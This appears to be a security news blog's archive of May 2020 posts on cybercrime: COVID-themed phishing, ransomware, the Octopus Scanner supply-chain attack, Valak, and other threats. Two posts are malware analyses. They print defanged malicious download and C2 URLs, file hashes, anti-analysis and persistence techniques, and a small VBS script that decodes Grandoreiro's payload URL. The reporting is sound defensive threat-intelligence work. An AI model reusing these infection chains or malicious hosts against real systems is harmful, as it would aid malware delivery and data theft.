Category Archives: cyber crime

Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)

The post Coronavirus-themed attacks May 24 – May 30, 2020 appeared first on Security Affairs.

A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

Security experts from D3Lab have uncovered a new COVID-19-themed phishing campaign that is targeting the users of the Italian National Institute for Social Security (INPS). Like a previous campaign observed in early April, threat actors set up a fake INPS site used (“inps-it[.]top”) to trick victims into downloading a malicious app.

“A new Phishing campaign against INPS users , similar to the previous one of April 6, 2020 , has been detected in the past few hours by our research and analysis center for Phishing campaigns.” reads the post published D3Lab.

“The fraudulent activity is carried out through a web domain created Ad Hoc with similarities, in the name, to the official one of the national social security institution with the intent to download malware to users interested in receiving the Covid-19 allowance allocated from the Italian state.”

COVID-19 campaign INPS
COVID-19 campaign INPS

D3Lab reported its findings to the Italian CERT-AGID that published a security advisory.

Cybercriminals are attempting to take advantage of the Covid-19 indemnity that the Italian government will give to some Italian citizens with specific requirements.

The citizens have to request the Covid-19 indemnity to the goverment through the INPS portal, for this reason, threat actors set up a fake INPS site asking people to download a phantom “application for the new COVID-19 indemnity” which actually returns a malicious APK for Android devices..

The malicious APT, named “acrobatreader.apk,” is a Trojan-Banker malware that is able to monitor the actions performed by the user.

The malware asks users to enable the accessibility service in order to take advantage of the legitimate functions of this service and achieve wider access to the system APIs to communicate with other apps on the device.

“As soon as the presence of connectivity is detected, an HTTP POST request is sent to C2 through the following url ” http: // greedyduck [.] Top / gate [.] Php ” passing two parameters:

  • ” Action “: with botcheck or injcheck values ;
  • ” Data “: information collected and passed in encrypted form (RC4).”

The CERT-AGID published the Indicators of Compromise (IoCs) here.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post A new COVID-19-themed campaign targets Italian users appeared first on Security Affairs.

NetWalker ransomware gang threatens to release Michigan State University files

Michigan State University is the last victim of the NetWalker ransomware, attackers threaten to leak stolen files if it will not pay the ransom in seven days.

Michigan State University hit by ransomware gang, NetWalker ransomware operators are threatening to leak stolen files if the university will not pay the ransom in seven days.

At the time of writing the ransom demand to decrypt their files was not disclosed.

Even if the MSU will restore from backups, the NetWalker ransomware gang will leak the documents stolen on its dark web leak site.

As a proof of the attack, NetWalker ransomware operators have shared five images on the leak site.

“These include two images showing a directory structure allegedly from the university’s network, a passport scan for a student, and two scans of Michigan State financial documents.” reported ZDNet.

Source ZDNet

The NetWalker group is very active in this period, the list of the victims of the gang includes the shipping giant Toll. Researchers also identified a new Coronavirus phishing campaign that aims at delivering the Netwalker Ransomware using COVID-19 lures.

The university did not reveal the extent of the attack, students and employees are still working from home due to the COVID-19 outbreak, anyway, the incident may not impact the e-learning activity.

NetWalker isn’t the unique ransomware gang that is threatening to publish data of the victims to force to pay the ransom, other gangs are DopplePaymer, Maze, Nefilim, Nemty, RagnarLocker, and REvil.

Pierluigi Paganini

(SecurityAffairs – Michigan State University, hacking)

The post NetWalker ransomware gang threatens to release Michigan State University files appeared first on Security Affairs.

A New York man was charged with stealing credit card data via SQL Injection attacks

The US DoJ announced that a New York City man was charged with hacking, credit card trafficking, and money laundering conspiracies.

New York City man Vitalii Antonenko (28) was charged with hacking, credit card trafficking, and money laundering conspiracies, states the US DoJ.

The man was arrested in March 2019 and detained after his arrival from Ukraine. The man was carrying computers and other digital media holding containing hundreds of thousands of stolen payment card numbers.

“Vitalii Antonenko, 28, was indicted on one count of conspiracy to gain unauthorized access to computer networks and to traffic in unauthorized access devices, and one count of money laundering conspiracy.” reads the press release published by US DoJ. “In March 2019, Antonenko was arrested and detained on money laundering charges at New York’s John F. Kennedy International Airport after he arrived there from Ukraine carrying computers and other digital media that held hundreds of thousands of stolen payment card numbers.”

The man nd co-conspirators obtained the credit card data by hacking into vulnerable computer networks.

The hackers launched SQL injection attacks to access vulnerable networks and steal Payment Card Data and other PII.

Crooks were able to steal card account numbers, expiration dates, and card verification values, along with other personally identifiable information (PII), then they were offering them for sale on cybercrime marketplaces.

“They used a hacking technique known as a “SQL injection attack” to access those networks without authorization, extracted Payment Card Data and other PII, and transferred it for sale on online criminal marketplaces.” continues the DoJ. “Once a co-conspirator sold the data, Antonenko and others used Bitcoin as well as traditional bank and cash transactions to launder the proceeds in order to disguise their nature, location, source, ownership, and control.”

The charges related to unauthorized access carry a sentence of up to five years in prison, three years of supervised release, a $250,000 fine, restitution and forfeiture.

Antonenko faces up to 20 years in prison and a $500,000 fine for the money laundering conspiracy charges.

Pierluigi Paganini

(SecurityAffairs – Card Data, hacking)

The post A New York man was charged with stealing credit card data via SQL Injection attacks appeared first on Security Affairs.

Himera and AbSent-Loader Leverage Covid19 Themes

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

Introduction

During our Cyber Defense monitoring activities we intercepted waves of incoming emails directed to many companies under our protective umbrella. These messages were leveraging FMLA (Family and Medical Leave Act) requests related to the ongoing COVID19 pandemics. These emails were weaponized with two versatile cyber-criminal tools: Himera and Absent-Loader.  

Figure1: Email vector example

Loaders are a type of malicious code specialized in loading additional malware code into the victim’s machine. Sometimes, a loader can assume “stealer” behavior, to opportunistically gatherer sensitive information even if they are not supposed to do that. Absent-Loader does that and despite its name behaves this way. In fact, stolen information market is definitely remunerative for cyber criminals: information gathered from infected systems are constantly sell in the underground, typically acquired by other, more structured criminal organization or also by business competitors.

Technical Analysis  

The sample used in this campaign first uses word document which refers to an executable, then it drops another executable and does a renaming operations to evade controls. The following picture reports the infection chain used in this campaign:

Figure 2: Infection Chain

The malicious email wave contained a .doc attachment. Following, the static information of this file:

NameCovid-19-PESANTATION.doc
Hash97FA1F66BD2B2F8A34AAFE5A374996F8
ThreatHimera Loader dropper
Size95,4 KB (97.745 byte)
FiletypeMicrosoft Word document 
Ssdeep1536:7fVmPSiRO8cOV8xCcoHrZvIdTZ2DSXMqcI3iL5PEs8VlbeH0btGDYLlNq2l+SEg:7fVz8zyUHlvId7H3iL5MVlbeHGkQvqTU

Table 1: Static information about the Malicious document

The interesting feature of this document is the fact that it does not leverage any type of macro or exploit, but it contains the entire executable within it as an embedded object. So, the user is led to double-click on the malicious icon, representing the executable. 

Thus, once clicked, it allows this malicious document to execute a malicious file named HimeraLoader.exe.

NameHimeraLoader.exe
Hash4620C79333CE19E62EFD2ADC5173B99A
ThreatSecond stage dropper
Size143 KB (146.944 byte)
FiletypeExecutable
File InfoMicrosoft Visual C++ 8
Ssdeep3072:jqW9iAayyenylzx0/2gJUSUZsnOA/TtYLeEoWj5PxJhQQeSH1pNGmHohurCMSiBf:jqW9iAayyenylzx0/2gJUSUZsnJ/TKLd

Table 2: Static information about the HimeraLoader executable

Inspecting the HimeraLoader.exe trace we noticed a really characteristic mutex created during the initial loading of the malicious code: the “HimeraLoader v1.6” mutex, or Mutant.

Figure 3: Himera Loader Mutex

Also, the sample performs some classic anti-analysis tricks using Windows API such as “IsDebbugerPresent”, “IsProcessorFeaturePresent” and “GetStartupInfoW”. The execution will take different paths in the program’s flow if the debugger is present. The function GetStartupInfoW retrieves the contents of the STARTUPINFO structure that was specified when the calling process was created. This function takes as parameter a pointer to a STARTUPINFO structure that receives the startup information and does not return a value.

Figure 4: Relevant strings of the Loader

When the Himera Loader goes through its execution and passes all anti-analysis tricks, it gathers another binary from http:]//195.]2.]92.]151/ad/da/drop/smss.]exe . The remote server is operated by Hosting Technologies LLC, a company running the Russian hosting service brand “VDSina.ru”. 

The AbSent-Loader 

The file downloaded from the dropurl has the following static information:

Namesmss[1].exe
Hash4D2207059FE853399C8F2140E63C58E3
ThreatDropper/Injector
Size0,99 MB (1.047.040 byte)
FiletypeExecutable
File InfoMicrosoft Visual C++ 8
Ssdeep24576:+9d+UObalbls+rcaN+cFsyQIDHx2JrjDwc9bmfRiHwl:+9d+UObaVzrcaN+cKypDHx2Jr/wYbmJd

Table 3: Static information about the AbsentLoader Payload

When “smms.exe” is executed, it copies itself in a new file winsvchost.exe in the %TEMP% path and creates a scheduled task to maintain persistence after reboot.

Figure 5: Evidence of the Scheduled Task

Moreover, the malware adopts some interesting anti-debug techniques, like the GetTickcount one. The technique is quite similar to that one described in one of our previous report. there is immediately the subtraction of the two values and it is placed in EAX register. After the “call eax” instruction, an immediate subtraction of the first GetTickCount  API call results and this second one is executed. 

Figure 6: GetTickCount anti-debug Technique

Then, the malware establishes TCP connection every 15 minutes. These connections are directed to the same remote host operated by Hosting Technologies LLC  (195.2.92.151) but this time it sends HTTP POST requests to the “/ad/da/gate.php” resource.

Figure 7: Evidence of some relevant strings inside the payload

This payload is a new version of AbSent-Loader, a piece of malware that, despite its name, behaves also like a bot, lacking most modern advanced features but sophisticated enough to maintain persistence on the victim host and to escalate the attack with follow up malware implants. 

Conclusion

The attack we intercepted and described here is a clear example of the new threats that are approaching cyberspace during these months: new criminal threat actors with the sole objective to economically exploit the emotional reactions of the people willing to keep the economic fabric alive and running to support the Covid19 response.

In this particular period, cyberspace is getting more and more risky for companies and people, the cyber criminality raised during the lock-downs and these malicious actors are using all the possible mediums to make more money at the expense of companies and organizations. For this reason, we strongly advise companies to adapt and enhance their cyber security perimeter to resist the new volumes and types of cyber attacks we are experiencing these days.

Indicators of Compromise (IoCs) and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – COVID19, hacking)

The post Himera and AbSent-Loader Leverage Covid19 Themes appeared first on Security Affairs.

Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub

GitHub has issued a security alert warning of a malware campaign that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub has issued a security alert warning of a piece of malware dubbed Octopus Scanner that is spreading on its platform via boobytrapped NetBeans Java projects.

GitHub’s security team discovered the malicious code in projects managed using the Apache NetBeans IDE (integrated development environment), a complete environment composed of editors, wizards, and templates that help users to create applications in Java, PHP and many other languages. t

On March 9, a security researcher informed GitHub about a set of GitHub-hosted repositories that were actively serving malware. The company immediately investigated the incident and discovered malware designed to enumerate and backdoor NetBeans projects, “and which uses the build process and its resulting artifacts to spread itself.”

What makes this case different from previous abuses of the platforms is that the owners of the repositories were aware that they were committing backdoored code into their repositories.

GitHub’s Security Incident Response Team (SIRT) received its initial notification about a set of repositories serving malware-infected open source projects from security researcher JJ.” reads a post published by Github.

“this report was different. The owners of the repositories were completely unaware that they were committing backdoored code into their repositories.”

The Octopus Scanner identifies the NetBeans project files and embeds malicious payload both in project files and build JAR files.

Below is a high -evel description of the Octopus Scanner activity:

  • Identify user’s NetBeans directory
  • Enumerate all projects in the NetBeans directory
  • Copy malicious payload cache.dat to nbproject/cache.dat
  • Modify the nbproject/build-impl.xml file to make sure the malicious payload is executed every time NetBeans project is build
  • If the malicious payload is an instance of the Octopus Scanner itself the newly built JAR file is also infected.
Netbeans octopus-supply chain attack

Experts uncovered 26 open source projects that were backdoored by the Octopus Scanner malware and that were serving backdoored code.

The Octopus Scanner campaign is not recent, it has been going on for years. Experts reported that the oldest sample of the malware was uploaded on the VirusTotal in August 2018.

Upon downloading any of the 26 projects, the malware would infect users’ local computers. The malware scans the victim’s workstation for a local NetBeans IDE install, and attempt to backdoor other developer’s Java projects.

According to the experts, Octopus Scanner is a multiplatform malware, it runs on Windows, macOS, and Linux and downloads a remote access trojan (RAT).

“However, if it was found, the malware would proceed to backdoor NetBeans project builds through the following mechanisms:

  1. It makes sure that every time a project was built, any resulting JAR files got infected with a so-called dropper. A dropper is a mechanism that “drops” something to the filesystem to execute. When executed, the dropper payload ensured local system persistence and would subsequently spawn a Remote Administration Tool (RAT), which connects to a set of C2 servers.
  2. It tries to prevent any NEW project builds from replacing the infected one, to ensure that its malicious build artifacts remained in place.”

The ultimate goal of the campaign is to deliver the RAT on the machines of developers working on sensitive projects to steal sensitive information.

“It was interesting that this malware attacked the NetBeans build process specifically since it is not the most common Java IDE in use today,” GitHub concludes.

“If malware developers took the time to implement this malware specifically for NetBeans, it means that it could either be a targeted attack, or they may already have implemented the malware for build systems such as Make, MsBuild, Gradle and others as well and it may be spreading unnoticed,”

“While infecting build processes is certainly not a new idea, seeing it actively deployed and used in the wild is certainly a disturbing trend.”

Pierluigi Paganini

(SecurityAffairs – NetBeans, hacking)

The post Octopus Scanner Malware: open source supply chain attack via NetBeans projects on GitHub appeared first on Security Affairs.

An archive with 20 Million Taiwanese’ citizens leaked in the dark web

Security experts from Cyble discovered in the dark web a database containing details of over 20 Million Taiwanese citizens.

A few weeks ago, threat intelligence firm Cyble discovered in the dark web a database containing details of over 20 Million Taiwanese citizens.

According to the experts, the leak includes government data of an entire country, it was leaked online by a reputable actor that goes online with moniker ‘Toogod.”

“A few weeks ago, our researchers came across a leaked database on the darkweb where a known and reputable actor ‘Toogod” dropped the database of “Taiwan Whole Country Home Registry DB” comprising of 20 Million+ records.” reads a post published by Cyble.

The database size is 3.5 GB, exposed data includes full name, full address, ID, gender, date of birth, and other info.

Taiwanese government data leak

The seller claims the database dates back as 2019, but Cyble researchers noted the last DOB record was from 2008. The database contains certain records with ‘NULL/empty’ DoB records, making it impossible to determine how recent the dump is.

Experts are still investigating the leak and will provide an update as soon as possible.

Cyble researchers have acquired the leak and will add soon its data to its AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – Taiwanese database, dark web)

The post An archive with 20 Million Taiwanese’ citizens leaked in the dark web appeared first on Security Affairs.

Israel ’s national cyber chief warns of rising of cyber-warfare

Israel ’s national cyber chief acknowledged the country had thwarted a major cyber attack in April against its water systems.

Israel’s national cyber chief Yigal Unna officially confirmed that the country in April had thwarted a major cyber attack against its water systems. The media, citing officials that spoke under condition of anonymity, attributed the “synchronized and organized attack” to the Government of Teheran.

Yigal Unna did not explicitly attribute the attack to Iran, he only warned of unpredictable developments of an ongoing stealth Information warfare.

“Rapid is not something that describes enough how fast and how crazy and hectic things are moving forward in cyberspace and I think we will remember this last month and May 2020 as a changing point in the history of modern cyber warfare,” he told to the audience of the virtual cyber conference CyberechLive Asia.

“If the bad guys had succeeded in their plot we would now be facing, in the middle of the Corona crisis, very big damage to the civilian population and a lack of water and even worse than that.”

Unna pointed out that the attempt to hack into Israel’s water systems marked the first time in modern history that “we can see something like this aiming to cause damage to real life and not to IT or data.”

At the end of April, the Israeli government has issued an alert to organizations in the water sector following a series of cyberattacks that targeted the water facilities.

At the time, Israel’s National Cyber Directorate announced to have received reports of cyber attacks aimed at supervisory control and data acquisition (SCADA) systems at wastewater treatment plants, pumping stations and sewage facilities.

Organizations were recommended to implement supplementary security measures to protect SCADA systems used in the water and energy sectors. The government urges to immediately change the passwords of control systems exposed online, ensure that their software is up to date, and reduce their exposure online.

The good news is that according to the report from the Israel’s Water Authority, the attacks did not impact operations at the facilities.

Intelligence experts believe that Israel and Iran are engaged in a covert cyber dispute and recently also hit critical infrastructure or both countries.

attacks. Most famously, U.S. and Israeli intelligence agencies are suspected of unleashing a computer worm called Stuxnet years ago in an attempt to disrupt Iran’s nuclear program.

Israel is suspected to be behind the recent cyberattack which disrupted some operations at Iran’s Shahid Rajaei Port, located near the Strait of Hormuz.

“It is a part of some attack over Israel and over the national security of Israel and not for financial benefit,” Unna added. “The attack happened but the damage was prevented and that is our goal and our mission. And now we are in the middle of preparing for the next phase to come because it will come eventually.”

Unna said the cyber attack marked a historic turning point in cyber warfare.

“Cyber winter is coming and coming even faster than I suspected,” he said. “We are just seeing the beginning.”

Pierluigi Paganini

(SecurityAffairs – Israel, Iran)

The post Israel ’s national cyber chief warns of rising of cyber-warfare appeared first on Security Affairs.

Google TAG report Q1 details about nation-state hacking and disinformation

Google Threat Analysis Group (TAG) has published today its first TAG quarterly report that analyzes rising trends in nation-state and financially motivated attacks.

Google also discloses seven coordinated political influence campaigns that took place on its platforms during Q1 2020.

The Google Threat Analysis Group (TAG) is a group inside the Google’s security team that tracks operations conducted by nation-state actors and cybercrime groups. Google TAG has published today its first TAG quarterly report, the Q1 2020 TAG Bulletin, that provides insights on the campaigns monitored in the first quarter of 2020.

The report includes recent findings on government-backed phishing, threats, and disinformation campaigns, as well as information about actions the tech giant has taken against accounts coordinated influence campaigns. 

A first scaring trend reported by Google is the rising of hack-for-fire companies currently operating out of India.

Another trend was the rising number of political influence campaigns carried out by nation-state actors worldwide.

Experts confirm that threat actor continues to use COVID-19 lures, the pandemic has taken center stage in the world of government-backed hacking. Google continues to uncover COVID-19 themed attacks, groups like Iran-linked Charming Kitten focuses on medical and healthcare professionals, including World Health Organization (WHO) employees.

Experts reported new activity from “hack-for-hire” firms, many based in India, that are using Gmail accounts spoofing the WHO to target business leaders in financial services, consulting, and healthcare corporations within numerous countries including, the U.S., Slovenia, Canada, India, Bahrain, Cyprus, and the UK.

The lures are designed to trick victims into signing up for direct notifications from the WHO to stay informed of COVID-19 related announcements, and link to websites under the control of the attackers that clone the official WHO website. 

“We’ve seen new activity from “hack-for-hire” firms, many based in India, that have been creating Gmail accounts spoofing the WHO,” said Shane Huntley, head of Google TAG.

“The accounts have largely targeted business leaders in financial services, consulting, and healthcare corporations within numerous countries including, the US, Slovenia, Canada, India, Bahrain, Cyprus, and the UK.”

nation-state-COVID-19-campaign

While there have been many hack-for-hire companies around the world, most are located in the UE, Israel, and some Arab countries.

This is the first time that a report references the activity of hack-for-hire Indian companies.

The Google TAG also investigated groups that have also engaged in coordinated social and political influence campaigns.

The TAG team tracked a total of seven influence operations in Q1 2020.

In January Google terminated three YouTube channels as part of a coordinated influence operation linked to Iranian state-sponsored International Union of Virtual Media (IUVM) news organization.

In February, the company terminated one advertising account and 82 YouTube channels that were employed in a coordinated influence operation linked to Egypt.

The campaign was sharing political content in Arabic that was supportive of Saudi Arabia, the UAE, Egypt, and Bahrain and was critical of Iran and Qatar. The campaign being tied to the digital marketing firm New Waves based in Cairo.

In March, TAG terminated five different influence operations.

  • Three advertising accounts, one AdSense account, and 11 YouTube channels part of a coordinated influence operation linked to India sharing pro-Qatar messages.
  • Google banned one Play Store developer and terminated 68 YouTube channels as part of a coordinated influence operation sharing political content in Arabic supportive of Turkey and critical of the UAE and Yemen.
  • Google also terminated one advertising account, one AdSense account, 17 YouTube channels, and banned one Play developer involved in a coordinated influence operation linked to Egypt supporting of Saudi Arabia, the UAE, Egypt, and Bahrain and critical of Iran and Qatar.
  • Google also banned one Play developer and terminated 78 YouTube channels used in a coordinated influence operation linked to Serbia.
  • Google also shut down 18 YouTube channels that were part of a coordinated influence operation linked to Indonesia.

“Since March, we’ve removed more than a thousand YouTube channels that we believe to be part of a large campaign and that were behaving in a coordinated manner. These channels were mostly uploading spammy, non-political content, but a small subset posted primarily Chinese-language political content similar to the findings of a recent Graphika report. We’ll also share additional removal actions from April and May in the Q2 Bulletin.” concludes Google.

Pierluigi Paganini

(SecurityAffairs – Google TAG, nation-state acting)

The post Google TAG report Q1 details about nation-state hacking and disinformation appeared first on Security Affairs.

Valak a sophisticated malware that completely changed in 6 months

Valak malware has rapidly changed over the past six months, it was initially designed as a loader, but now it implemented infostealer capabilities.

The Valak malware completely changed over the past six months, it was first developed to act as a loader, but now it implements also infostealer capabilities. 

The malicious code fist appeared in the threat landscape in late 2019, over the past six months experts observed more than 20 versions that finally changing the malware from a loader to an infostealer used in attacks against individuals and enterprise.

“The Valak Malware is a sophisticated malware previously classified as a malware loader. Though it was first observed in late 2019, the Cybereason Nocturnus team has investigated a series of dramatic changes, an evolution of over 30 different versions in less than six months.” reads the analysis published by Cybereason. “This research shows that Valak is more than just a loader for other malware, and can also be used independently as an information stealer to target individuals and enterprises. “

The malicious code was employed in attacks mainly aimed at entities in the US and Germany, in which it was previously bundled with Ursnif and IcedID threats.

The attack chain starts with phishing messages using a weaponized Microsoft Word documents containing malicious macros. Upon enabling the macros, a .DLL file named “U.tmp” is downloaded and saved to a temporary folder.

valak

When the DLL is executed it drops and launches using a WinExec API call. Valak malware uses a malicious JavaScript file with a random name that changes each time it is executed.

The JavaScript code establishes the connections to command-and-control (C2) servers. The scripts also download additional files, decode them using Base64 and an XOR cipher, and then deploy the main payload.

“In the first stage, Valak laid the foundation for the attack. In the second stage, it downloads additional modules for reconnaissance activity and to steal sensitive information.” continues the post.

Valak uses two main payloads, project.aspx and a.aspx, the former ( the second stage JS) manages registry keys, task scheduling for malicious activities, and persistence, whereas the latter, named PluginHost.exe, named “PluginHost.exe”, is an executable file used to manage additional components.

The Valak’s Program class contains the main function of the file main(), which executes the function GetPluginBytes() to download the module components with type “ManagedPlugin”. These components will be loaded reflectively to the executable’s memory and allow the malware to add plugin capabilities.

PluginHost.exe implements multiple functions by loading the specific modules, below a list of modules observed by the experts:

  • Systeminfo:  responsible for extensive reconnaissance;targets local and domain admins
  • Exchgrabber: aims to steal Microsoft Exchange data and infiltrates the enterprises mail system
  • IPGeo: verifies the geolocation of the target
  • Procinfo: collects information about the infected machine’s running processes
  • Netrecon: perform performs network reconnaissance
  • Screencap: captures screenshots from the infected machine

The Systeminfo module contains several reconnaissance functions that allow gathering information about the user, the machine, and existing AV products.

Recent Valak variants have been employed in attacks against Microsoft Exchange servers, likely as part of attacks against enterprises.

“More recent versions of Valak target Microsoft Exchange servers to steal enterprise mailing information and passwords along with the enterprise certificate. This has the potential to access critical enterprise accounts, causing damage to organizations, brand degradation, and ultimately a loss of consumer trust.” concludes the post.

“The extended malware capabilities suggest that Valak can be used independently with or without teaming up with other malware. That being said, it seems as though the threat actor behind Valak is collaborating with other threat actors across the E-Crime ecosystem to create an even more dangerous piece of malware.”

Pierluigi Paganini

(SecurityAffairs – Valak, malware)

The post Valak a sophisticated malware that completely changed in 6 months appeared first on Security Affairs.

Microsoft warns about ongoing PonyFinal ransomware attacks

Microsoft is warning organizations to deploy protections against a new strain of PonyFinal ransomware that has been in the wild over the past two months.

Microsoft’s security team issued a series of tweets warning organizations to deploy protections against a new piece of ransomware dubbed PonyFinal that has been in the wild over the past two months.

PonyFinal is Java-based ransomware that is manually distributed by threat actors. The ransomware first appeared in the threat landscape earlier this year and was involved in highly targeted attacks against selected targets, mainly in India, Iran, and the US.

Human-operated ransomware is a technique usually employed in nation-state attacks that is becoming very popular in the cybercrime ecosystem.

In human-operated ransomware attack scenario, attackers use stolen credentials, exploit misconfiguration and vulnerabilities to access target networks, attempt to escalate privileges and move laterally, and deliver malware and exfiltrate data.

Most infamous human-operated ransomware campaigns include SodinokibiSamasBitpaymer, and Ryuk.

PonyFinal operators initially target organizations’ systems management server via brute force attacks, then they deploy a VBScript to run a PowerShell reverse shell to perform data dumps. Threat actors also use a remote manipulator system to bypass event logging.

Once the PonyFinal attackers gained access to the target’s network, they will move laterally to infect other systems with the ransomware.

In many cases, attackers targeted workstations running the Java Runtime Environment (JRE) because the PonyFinal is written in Java, but is some attacked the gang installed JRE on systems before deploying the ransomware.

The PonyFinal ransomware usually adds the “.enc” extension to the names of the encrypted files, it drops a ransom note (named README_files.txt) on the infected systems. The ransom note contains the payment instructions.

Experts pointed out that the encryption scheme of the PonyFinal ransomware is secure and there is no way at the time to recover encrypted files.

Unfortunately, PonyFinal is one of the several human-operated ransomware that were employed in attacks aimed at the healthcare sector during the COVID-19 pandemic.

Other threat are NetWalker, Maze, REvil, RagnarLocker, and LockBit.

Pierluigi Paganini

(SecurityAffairs – Ponyfinal ransomware, hacking)

The post Microsoft warns about ongoing PonyFinal ransomware attacks appeared first on Security Affairs.

Grandoreiro Malware implements new features in Q2 2020

The updated Grandoreiro Malware equipped with latenbot-C2 features in Q2 2020 now extended to Portuguese banks

Grandoreiro is a Latin American banking trojan targeting Brazil, Mexico, Spain, Peru, and has now extended to Portugal.

Cybercriminals attempt to compromise computers to generate revenue by exfiltrating information from victims’ devices, typically banking-related information. During April and May 2020, a new Grandoreiro variant was identified. This piece of malware includes improvements in the way it is operating. The threat has been disseminating via malscam campaigns, as in the past, and the name of the victim is used as a part of the malicious attachment name, as shown below.

The attached file is an HTML document that downloads the Grandoreiro’s 1st stage – a VBScript file (VBS). After that, an ISO file is downloaded from the online server, according to the target country and campaign. During this investigation, several samples were found online, specifically grouped by campaigns and countries (see Technical Analysis).

The malware modus operandi is very similar to old samples, however, this new variant brings some improvements to how it is communicating with the C2 server. After analyzing it, similarities with latenbot-C2 traffic were identified and described below (another Brazilian trojan).

Grandoreiro operators probably are including Latenbot botnet modules as a way of improving communication between C2 and infected hosts – creating a kind of Grandoreiro botnet.

The malware is capable of collecting banking details from victims’ devices, get total control of the OS, reboot, and lockdown, windows overlay, keylogger capabilities, and performing browser interaction.

For more details about this threat see the Technical Analysis below.

Technical Analysis

The Grandoreiro malware has been distributed via malscan campaigns around the globe during Q2 2020. As can be observed during this publication, new features have been added to the new samples, including latenbot-C2 features (another Brazilian trojan – see @hasherezade analysis here), and the scope of malware was now extended to Portuguese banks.

Figure 1: Grandoreiro email template Q2 2020 (Portugal). The content of the attached file is HTML  with a short-URL that downloads the next stage (VBS file).

As observed below, after submitting the sample into VirusTotal it was classified as a variant of Grandoreiro trojan, as some changes were performed by crooks to improve this piece of malware.

Figure 2: Grandoreiro variant VT sample submitted on 2020-04-24 during this investigation.

This specific sample was distributed via a VBScript file, one of the different chains of Grandoreiro as detailed by ESET.

Figure 3: Possible ways that Grandoreiro distribution chains may appear (different colors show different paths the chain may take). The final ZIP archive may be encrypted and in some cases also protected by a password – credits ESET.

The malware has been distributed during April and May 2020 and has affected Portuguese users. One of the last analyzed samples (2020-05-21 – 8491a619dc6e182437bd4482d6e97e3a) is scrutinized below.

Grandoreiro VBS file – First stage (Portugal May 2020)


Filename: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs
MD5: 8491a619dc6e182437bd4482d6e97e3a
SHA1: 46d601a56103bf0a623d1c937eab41d8772de644


At first glance, the VBS file seems obfuscated, nonetheless, some details can be extracted such as the encoded string with the URL where the next stage is downloaded and the place where it will be executed on the target machine.

Figure 4: Grandoreiro VBS file (1st stage) obfuscated. Some details can be extracted from the code how highlighted above.

The following piece of code can be used to decode the strings hardcoded in the VBS file.

‘ Decryptor Grandoreiro VBS 1st stage – Portugal May 2020
‘ @sirpedrotavares – seguranca-informatica.pt
‘ Sample: 8491a619dc6e182437bd4482d6e97e3a
Module VBModule
Sub Main()
Dim result, cipher, i, tmp, output
cipher=”bnnj4))+3,(,-0(+.1(+**4+3/*)Cho`nolcifm(cmi”
For i = 1 To Len(cipher)
tmp = Mid(cipher, i, 1)
tmp = Chr(Asc(tmp)+ 6)
result = result + tmp
Next
output = result
Console.WriteLine(output)
End Sub
End Module

view rawgrandoreiro_vbs_decryptor_portugal_2020.vbs hosted with ❤ by GitHub

The decoded string is a URL pointing to a website where several samples of Grandoreiro are available. The samples are downloaded depending on the initial stage and the target country. The following URL was distributed in Portugal during April and May 2020 and described in this investigation.Encoded string: cipher=”bnnj4))+3,(,-0(+.1(+**4+3/*)Cho`nolcifm(cmi”–Decoded string: http://192.236.147.]100:1950/Inufturiols.iso

The Grandoreiro samples available on this server online were often changed by criminals as a way of bypassing AV’s detections. Based on metrics from May 20th, 1771 users were potentially infected or executed the  Grandoreiro 1st stage (VBS file).

Figure 5: Metrics collected from the Grandoreiro server on May 20th, 2020. Each sample is associated with different ongoing campaigns and target countries.

In detail, the sample distributed in Portugal was downloaded 224 times (Inufturiols.iso in Figure 5). The sample was available for download between 2020-05-18 and 2020-05-22.

An interesting point is that one day after data collection, on 2020/05/21, most of the samples were removed from the server by the malware operators, but the sample targeting Portugal was kept available for the next days.

Figure 6: Metrics collected from the server on May 21st, 2020 with the Portuguese sample kept by crooks.

The threats available on the server are the same, but different samples were created by Grandoreiro operators as observed below. The samples were grouped by countries or campaigns.

Figure 7: Grandoreiro samples (ISO files) available on the server online. 

The ISO files have a size range of 4MB to 7MB which is an unusual file size for image files. Theses files are an archive file that contains all the information that would be written to an optical disc. The malware is inside them and is dropped when the file is executed. This is not new, several threats have been distributed via ISO files past months (see more details in a ThreatPost publication here).

Digging into the details, when the VBS file (1st stage) is executed on the victim’s machine, the ISO file is downloaded from the server online.

Figure 8: ISO file downloaded from the server online and stored on the IE web cache.

Next, the folder “ \nvreadmm ” is created on the AppData\Roaming directory, and the zip file with the malware inside is dropped (the zip filename can be observed in Figure 4 above).

Figure 9: Zip file with the malware inside is dropped into the “AppData\Roaming\nvreadmm” folder.

When the download is done, the unzip process starts. The PE file (Grandoreiro trojan malware) is extracted into the same folder and executed.

Figure 10: Grandoreiro extracting process ~ binary with a size of 331 MB.

Grandoreiro – Final Payload (Portugal May 2020)


Filename: Inufturiols.exe
MD5: 1f861de0794cd020072150db618da154
SHA1: c3f70025857ac7eca467412d35f17fc5ec10f659


The final payload is a PE file written in Delphi – a Latin American banking trojan. According to ESET, “Grandoreiro has been active at least since 2017 targeting Brazil and Peru, expanding to Mexico and Spain in 2019. “

